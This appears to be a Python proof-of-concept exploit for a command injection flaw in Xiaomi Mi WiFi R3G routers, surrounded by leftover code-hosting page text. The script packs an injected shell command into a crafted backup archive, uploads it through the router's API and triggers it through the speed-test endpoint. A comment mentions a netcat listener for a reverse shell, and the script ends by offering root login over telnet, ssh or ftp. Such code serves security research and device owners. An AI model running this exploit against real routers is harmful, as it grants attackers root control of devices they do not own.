代码拉取完成,页面将自动刷新
#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py
import os
import shutil
import tarfile
import requests
router_ip_address = "192.168.31.1"
router_ip_address = input("Router IP address [press enter for using the default {}]: ".format(router_ip_address)) or router_ip_address
# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command = "((sh /tmp/script.sh exploit) &)"
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
if os.path.exists("build"):
shutil.rmtree("build")
os.makedirs("build")
# make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml", "rt", encoding = "UTF-8") as f:
template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
# print(data)
with open("build/speedtest_urls.xml", "wt", encoding = "UTF-8") as f:
f.write(data)
print("****************")
print("router_ip_address: " + router_ip_address)
print("stok: " + stok)
print("****************")
# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz") as tar:
tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
tar.add("script.sh")
# tar.add("busybox")
# tar.add("extras/wget")
# tar.add("extras/xiaoqiang")
# upload config file
print("start uploading config file...")
r1 = requests.post(
"http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok),
files={"image": open("build/payload.tar.gz", 'rb')},
proxies=proxies
)
# print(r1.text)
# exec download speed test, exec command
print("start exec command...")
r2 = requests.get(
"http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok),
proxies=proxies
)
# print(r2.text)
print("done! Now you can connect to the router using several options: (user: root, password: root)")
print("* telnet {}".format(router_ip_address))
print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address))
print("* ftp: using a program like cyberduck")
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
马建仓 AI 助手
